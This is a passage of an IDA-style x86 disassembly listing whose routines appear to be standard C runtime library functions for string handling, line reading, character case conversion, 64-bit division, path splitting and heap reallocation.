add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_416D14: ; CODE XREF: sub_416CDE+27�j
push esi
call sub_418704
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_416D29
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_416D3D
; ---------------------------------------------------------------------------
loc_416D29: ; CODE XREF: sub_416CDE+42�j
test al, 1
jz short loc_416D3D
test al, 8
jz short loc_416D3D
test ah, 4
jnz short loc_416D3D
mov dword ptr [esi+18h], 200h
loc_416D3D: ; CODE XREF: sub_416CDE+49�j
; sub_416CDE+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41C447
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_416D67
; ---------------------------------------------------------------------------
loc_416D5A: ; CODE XREF: sub_416CDE+B�j
; sub_416CDE+1D�j
mov dword_46BB04, 16h
or eax, 0FFFFFFFFh
loc_416D67: ; CODE XREF: sub_416CDE+7A�j
pop edi
pop esi
retn
sub_416CDE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D70 proc near ; CODE XREF: sub_406B84+2AC�p
; sub_406B84+2CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_416DA1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_416D9F
jz short loc_416DA1
dec ecx
dec ecx
loc_416D9F: ; CODE XREF: sub_416D70+29�j
not ecx
loc_416DA1: ; CODE XREF: sub_416D70+9�j
; sub_416D70+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_416D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416DB0 proc near ; CODE XREF: sub_407075+5C�p
; sub_407075+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416E64
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_416DDA
loc_416DCB: ; CODE XREF: sub_416DB0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_416E0B
test edi, 3
jnz short loc_416DCB
loc_416DDA: ; CODE XREF: sub_416DB0+19�j
; sub_416DB0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_416DDA
mov eax, [edi-4]
test al, al
jz short loc_416E18
test ah, ah
jz short loc_416E13
test eax, 0FF0000h
jz short loc_416E0E
test eax, 0FF000000h
jnz short loc_416DDA
loc_416E0B: ; CODE XREF: sub_416DB0+20�j
dec edi
jmp short loc_416E1B
; ---------------------------------------------------------------------------
loc_416E0E: ; CODE XREF: sub_416DB0+52�j
sub edi, 2
jmp short loc_416E1B
; ---------------------------------------------------------------------------
loc_416E13: ; CODE XREF: sub_416DB0+4B�j
sub edi, 3
jmp short loc_416E1B
; ---------------------------------------------------------------------------
loc_416E18: ; CODE XREF: sub_416DB0+47�j
sub edi, 4
loc_416E1B: ; CODE XREF: sub_416DB0+5C�j
; sub_416DB0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_416E30
mov ebx, ecx
shr ecx, 2
jnz short loc_416E7C
jmp short loc_416E4C
; ---------------------------------------------------------------------------
loc_416E30: ; CODE XREF: sub_416DB0+75�j
; sub_416DB0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_416E6A
mov [edi], dl
inc edi
dec ecx
jz short loc_416E60
test esi, 3
jnz short loc_416E30
mov ebx, ecx
shr ecx, 2
jnz short loc_416E7C
loc_416E4C: ; CODE XREF: sub_416DB0+7E�j
; sub_416DB0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_416E60
loc_416E53: ; CODE XREF: sub_416DB0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_416E62
dec ecx
jnz short loc_416E53
loc_416E60: ; CODE XREF: sub_416DB0+8B�j
; sub_416DB0+A1�j
mov [edi], cl
loc_416E62: ; CODE XREF: sub_416DB0+AB�j
pop ebx
pop esi
loc_416E64: ; CODE XREF: sub_416DB0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416E6A: ; CODE XREF: sub_416DB0+85�j
; sub_416DB0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416E74: ; CODE XREF: sub_416DB0+E4�j
; sub_416DB0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_416E4C
loc_416E7C: ; CODE XREF: sub_416DB0+7C�j
; sub_416DB0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416E74
test dl, dl
jz short loc_416E6A
test dh, dh
jz short loc_416EC8
test edx, 0FF0000h
jz short loc_416EB8
test edx, 0FF000000h
jnz short loc_416E74
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416EB8: ; CODE XREF: sub_416DB0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416EC8: ; CODE XREF: sub_416DB0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416DB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EE0 proc near ; CODE XREF: sub_4071B6+2A2�p
; sub_40CD3A+3012�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_416F01
xor eax, eax
jmp short loc_416F03
; ---------------------------------------------------------------------------
loc_416F01: ; CODE XREF: sub_416EE0+1B�j
mov eax, edi
loc_416F03: ; CODE XREF: sub_416EE0+1F�j
cld
pop edi
leave
retn
sub_416EE0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_416F20
loc_416F10: ; CODE XREF: sub_416F20+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_416F20
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416F20 proc near ; CODE XREF: sub_408503+D9�p
; sub_40CD3A+3F3�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00416F10 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_416F26: ; CODE XREF: sub_4158E0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_416F4B
loc_416F38: ; CODE XREF: sub_416F20+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_416F10
test cl, cl
jz short loc_416F94
test edx, 3
jnz short loc_416F38
loc_416F4B: ; CODE XREF: sub_416F20+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_416F56: ; CODE XREF: sub_416F20+61�j
; sub_416F20+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_416F98
and eax, 81010100h
jz short loc_416F56
and eax, 1010100h
jnz short loc_416F92
and esi, 80000000h
jnz short loc_416F56
loc_416F92: ; CODE XREF: sub_416F20+68�j
; sub_416F20+81�j ...
pop esi
pop edi
loc_416F94: ; CODE XREF: sub_416F20+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_416F98: ; CODE XREF: sub_416F20+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_416FD5
test al, al
jz short loc_416F92
cmp ah, bl
jz short loc_416FCE
test ah, ah
jz short loc_416F92
shr eax, 10h
cmp al, bl
jz short loc_416FC7
test al, al
jz short loc_416F92
cmp ah, bl
jz short loc_416FC0
test ah, ah
jz short loc_416F92
jmp short loc_416F56
; ---------------------------------------------------------------------------
loc_416FC0: ; CODE XREF: sub_416F20+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_416FC7: ; CODE XREF: sub_416F20+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_416FCE: ; CODE XREF: sub_416F20+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_416FD5: ; CODE XREF: sub_416F20+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_416F20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416FDC proc near ; CODE XREF: sub_408503+C6�p
; sub_40CD3A+43DF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_416FF0
xor eax, eax
jmp short loc_417026
; ---------------------------------------------------------------------------
loc_416FF0: ; CODE XREF: sub_416FDC+E�j
dec [ebp+arg_4]
push esi
jz short loc_417020
mov esi, [ebp+arg_8]
loc_416FF9: ; CODE XREF: sub_416FDC+42�j
dec dword ptr [esi+4]
js short loc_417008
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41700F
; ---------------------------------------------------------------------------
loc_417008: ; CODE XREF: sub_416FDC+20�j
push esi
call sub_41C178
pop ecx
loc_41700F: ; CODE XREF: sub_416FDC+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41702A
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_417020
dec [ebp+arg_4]
jnz short loc_416FF9
loc_417020: ; CODE XREF: sub_416FDC+18�j
; sub_416FDC+3D�j ...
and byte ptr [edi], 0
loc_417023: ; CODE XREF: sub_416FDC+55�j
mov eax, ebx
pop esi
loc_417026: ; CODE XREF: sub_416FDC+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41702A: ; CODE XREF: sub_416FDC+36�j
cmp edi, [ebp+arg_0]
jnz short loc_417020
xor ebx, ebx
jmp short loc_417023
sub_416FDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417033 proc near ; CODE XREF: sub_409A45+6�p
; sub_409A63+48�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_46BB9C, 0
push ebx
push esi
push edi
jnz short loc_417060
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4170F9
cmp eax, 5Ah
jg loc_4170F9
add eax, 20h
jmp loc_4170F9
; ---------------------------------------------------------------------------
loc_417060: ; CODE XREF: sub_417033+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_417094
cmp dword_4385FC, esi
jle short loc_417082
push esi
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41708C
; ---------------------------------------------------------------------------
loc_417082: ; CODE XREF: sub_417033+42�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, esi
loc_41708C: ; CODE XREF: sub_417033+4D�j
test eax, eax
jnz short loc_417094
loc_417090: ; CODE XREF: sub_417033+AD�j
mov eax, ebx
jmp short loc_4170F9
; ---------------------------------------------------------------------------
loc_417094: ; CODE XREF: sub_417033+3A�j
; sub_417033+5B�j
mov edx, off_4383F0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4170B8
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4170C1
; ---------------------------------------------------------------------------
loc_4170B8: ; CODE XREF: sub_417033+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4170C1: ; CODE XREF: sub_417033+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_46BB9C
call sub_41C639
add esp, 20h
test eax, eax
jz short loc_417090
cmp eax, esi
jnz short loc_4170EC
movzx eax, [ebp+var_4]
jmp short loc_4170F9
; ---------------------------------------------------------------------------
loc_4170EC: ; CODE XREF: sub_417033+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4170F9: ; CODE XREF: sub_417033+16�j
; sub_417033+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417033 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417100 proc near ; CODE XREF: sub_40A922+3D�p
; sub_40C10D+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_417121
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_417171
; ---------------------------------------------------------------------------
loc_417121: ; CODE XREF: sub_417100+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41712F: ; CODE XREF: sub_417100+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41712F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41715A
cmp edx, [esp+4+arg_4]
ja short loc_41715A
jb short loc_417162
cmp eax, [esp+4+arg_0]
jbe short loc_417162
loc_41715A: ; CODE XREF: sub_417100+4A�j
; sub_417100+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_417162: ; CODE XREF: sub_417100+52�j
; sub_417100+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_417171: ; CODE XREF: sub_417100+1F�j
pop ebx
retn 10h
sub_417100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417180 proc near ; CODE XREF: sub_40A922+24�p
; sub_40C10D+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_4171A2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4171E3
; ---------------------------------------------------------------------------
loc_4171A2: ; CODE XREF: sub_417180+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4171B0: ; CODE XREF: sub_417180+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4171B0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4171DE
cmp edx, [esp+8+arg_4]
ja short loc_4171DE
jb short loc_4171DF
cmp eax, [esp+8+arg_0]
jbe short loc_4171DF
loc_4171DE: ; CODE XREF: sub_417180+4E�j
; sub_417180+54�j
dec esi
loc_4171DF: ; CODE XREF: sub_417180+56�j
; sub_417180+5C�j
xor edx, edx
mov eax, esi
loc_4171E3: ; CODE XREF: sub_417180+20�j
pop esi
pop ebx
retn 10h
sub_417180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171E8 proc near ; CODE XREF: sub_40A9D8+1E3�p
; sub_40C574+104�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_415B10
cmp eax, 1
pop ecx
jb short loc_417223
cmp byte ptr [ebx+1], 3Ah
jnz short loc_417223
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_41721F
push 2
push ebx
push esi
call sub_41CC3D
add esp, 0Ch
and byte ptr [esi+2], 0
loc_41721F: ; CODE XREF: sub_4171E8+25�j
inc ebx
inc ebx
jmp short loc_41722D
; ---------------------------------------------------------------------------
loc_417223: ; CODE XREF: sub_4171E8+18�j
; sub_4171E8+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41722D
and byte ptr [eax], 0
loc_41722D: ; CODE XREF: sub_4171E8+39�j
; sub_4171E8+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_4172A5
loc_417240: ; CODE XREF: sub_4171E8+87�j
mov cl, [eax]
movzx edx, cl
test byte_46D041[edx], 4
jz short loc_417251
inc eax
jmp short loc_41726B
; ---------------------------------------------------------------------------
loc_417251: ; CODE XREF: sub_4171E8+64�j
cmp cl, 2Fh
jz short loc_417265
cmp cl, 5Ch
jz short loc_417265
cmp cl, 2Eh
jnz short loc_41726B
mov [ebp+var_4], eax
jmp short loc_41726B
; ---------------------------------------------------------------------------
loc_417265: ; CODE XREF: sub_4171E8+6C�j
; sub_4171E8+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41726B: ; CODE XREF: sub_4171E8+67�j
; sub_4171E8+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_417240
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_4172A5
cmp [ebp+arg_8], 0
jz short loc_4172A0
sub edi, ebx
cmp edi, esi
jb short loc_417289
mov edi, esi
loc_417289: ; CODE XREF: sub_4171E8+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41CC3D
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4172A0: ; CODE XREF: sub_4171E8+97�j
mov ebx, [ebp+arg_4]
jmp short loc_4172AF
; ---------------------------------------------------------------------------
loc_4172A5: ; CODE XREF: sub_4171E8+56�j
; sub_4171E8+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_4172AF
and byte ptr [ecx], 0
loc_4172AF: ; CODE XREF: sub_4171E8+BB�j
; sub_4171E8+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_417302
cmp edi, ebx
jb short loc_417302
cmp [ebp+arg_C], 0
jz short loc_4172DF
sub edi, ebx
cmp edi, esi
jb short loc_4172C8
mov edi, esi
loc_4172C8: ; CODE XREF: sub_4171E8+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41CC3D
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4172DF: ; CODE XREF: sub_4171E8+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_41732A
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4172EF
mov esi, eax
loc_4172EF: ; CODE XREF: sub_4171E8+103�j
push esi
push [ebp+var_4]
push edi
call sub_41CC3D
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_41732A
; ---------------------------------------------------------------------------
loc_417302: ; CODE XREF: sub_4171E8+CC�j
; sub_4171E8+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_417320
sub eax, ebx
cmp eax, esi
jnb short loc_417311
mov esi, eax
loc_417311: ; CODE XREF: sub_4171E8+125�j
push esi
push ebx
push edi
call sub_41CC3D
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_417320: ; CODE XREF: sub_4171E8+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41732A
and byte ptr [eax], 0
loc_41732A: ; CODE XREF: sub_4171E8+FC�j
; sub_4171E8+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4171E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41732F proc near ; CODE XREF: sub_40B0EC+19�p
; sub_412B8B+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_417D6C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41736D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41737A
; ---------------------------------------------------------------------------
loc_41736D: ; CODE XREF: sub_41732F+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_417C57
pop ecx
pop ecx
loc_41737A: ; CODE XREF: sub_41732F+3C�j
mov eax, esi
pop esi
leave
retn
sub_41732F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41737F proc near ; CODE XREF: sub_40B363+2C�p
; sub_416663+35�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_41739A
push [ebp+arg_4]
call sub_415BE9
pop ecx
jmp loc_41761A
; ---------------------------------------------------------------------------
loc_41739A: ; CODE XREF: sub_41737F+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_4173AF
push [ebp+arg_0]
call sub_415C9B
pop ecx
jmp loc_417618
; ---------------------------------------------------------------------------
loc_4173AF: ; CODE XREF: sub_41737F+20�j
mov eax, dword_46D168
cmp eax, 3
jnz loc_4174BF
loc_4173BD: ; CODE XREF: sub_41737F+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41749B
push [ebp+arg_0]
call sub_418CBD
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_417476
cmp esi, dword_46D160
ja short loc_41742F
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4194C6
add esp, 0Ch
test eax, eax
jnz short loc_41742B
push esi
call sub_419011
mov edi, eax
pop ecx
test edi, edi
jz short loc_41742F
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41740F
mov eax, esi
loc_41740F: ; CODE XREF: sub_41737F+8C�j
push eax
push ebx
push edi
call sub_4153F0
push ebx
call sub_418CBD
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_418CE8
add esp, 18h
loc_41742B: ; CODE XREF: sub_41737F+74�j
test edi, edi
jnz short loc_417472
loc_41742F: ; CODE XREF: sub_41737F+62�j
; sub_41737F+81�j
test esi, esi
jnz short loc_417436
push 1
pop esi
loc_417436: ; CODE XREF: sub_41737F+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_46D164
call dword_42114C ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_417472
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41745E
mov eax, esi
loc_41745E: ; CODE XREF: sub_41737F+DB�j
push eax
push ecx
push edi
call sub_4153F0
push [ebp+arg_0]
push ebx
call sub_418CE8
add esp, 14h
loc_417472: ; CODE XREF: sub_41737F+AE�j
; sub_41737F+D0�j
test ebx, ebx
jnz short loc_417497
loc_417476: ; CODE XREF: sub_41737F+56�j
test esi, esi
jnz short loc_41747D
push 1
pop esi
loc_41747D: ; CODE XREF: sub_41737F+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push dword_46D164
call dword_421160 ; RtlReAllocateHeap
mov edi, eax
loc_417497: ; CODE XREF: sub_41737F+F5�j
test edi, edi
jnz short loc_4174B8
loc_41749B: ; CODE XREF: sub_41737F+43�j
cmp dword_46BB64, 0
jz short loc_4174B8
push esi
call sub_418A88
test eax, eax
pop ecx
jnz loc_4173BD
jmp loc_417618
; ---------------------------------------------------------------------------
loc_4174B8: ; CODE XREF: sub_41737F+11A�j
; sub_41737F+123�j ...
mov eax, edi
jmp loc_41761A
; ---------------------------------------------------------------------------
loc_4174BF: ; CODE XREF: sub_41737F+38�j
cmp eax, 2
jnz loc_4175DA
cmp esi, 0FFFFFFE0h
ja short loc_4174DC
test esi, esi
jbe short loc_4174D9
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_4174DC
; ---------------------------------------------------------------------------
loc_4174D9: ; CODE XREF: sub_41737F+150�j
push 10h
pop esi
loc_4174DC: ; CODE XREF: sub_41737F+14C�j
; sub_41737F+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_4175BC
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_419A18
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_4175A0
cmp esi, dword_43A634
jnb short loc_417564
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_419DE0
add esp, 10h
test eax, eax
jz short loc_41752A
mov edi, [ebp+arg_0]
jmp short loc_41755C
; ---------------------------------------------------------------------------
loc_41752A: ; CODE XREF: sub_41737F+1A4�j
push edi
call sub_419AB4
mov edi, eax
pop ecx
test edi, edi
jz short loc_417564
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_417543
mov eax, esi
loc_417543: ; CODE XREF: sub_41737F+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_4153F0
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_419A6F
add esp, 18h
loc_41755C: ; CODE XREF: sub_41737F+1A9�j
test edi, edi
jnz loc_4174B8
loc_417564: ; CODE XREF: sub_41737F+18B�j
; sub_41737F+1B6�j
push esi
push 0
push dword_46D164
call dword_42114C ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_4175BC
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_417585
mov eax, esi
loc_417585: ; CODE XREF: sub_41737F+202�j
push eax
push [ebp+arg_0]
push edi
call sub_4153F0
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_419A6F
add esp, 18h
jmp short loc_4175B4
; ---------------------------------------------------------------------------
loc_4175A0: ; CODE XREF: sub_41737F+17F�j
push esi
push [ebp+arg_0]
push 0
push dword_46D164
call dword_421160 ; RtlReAllocateHeap
mov edi, eax
loc_4175B4: ; CODE XREF: sub_41737F+21F�j
test edi, edi
jnz loc_4174B8
loc_4175BC: ; CODE XREF: sub_41737F+162�j
; sub_41737F+1F8�j
cmp dword_46BB64, 0
jz loc_4174B8
push esi
call sub_418A88
test eax, eax
pop ecx
jnz loc_4174DC
jmp short loc_417618
; ---------------------------------------------------------------------------
loc_4175DA: ; CODE XREF: sub_41737F+143�j
; sub_41737F+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_417604
test esi, esi
jnz short loc_4175E8
push 1
pop esi
loc_4175E8: ; CODE XREF: sub_41737F+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push dword_46D164
call dword_421160 ; RtlReAllocateHeap
test eax, eax
jnz short loc_41761A
loc_417604: ; CODE XREF: sub_41737F+260�j
cmp dword_46BB64, 0
jz short loc_41761A
push esi
call sub_418A88
test eax, eax
pop ecx
jnz short loc_4175DA
loc_417618: ; CODE XREF: sub_41737F+2B�j
; sub_41737F+134�j ...
xor eax, eax
loc_41761A: ; CODE XREF: sub_41737F+16�j
; sub_41737F+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41737F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41761F proc near ; CODE XREF: sub_40B9BC+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
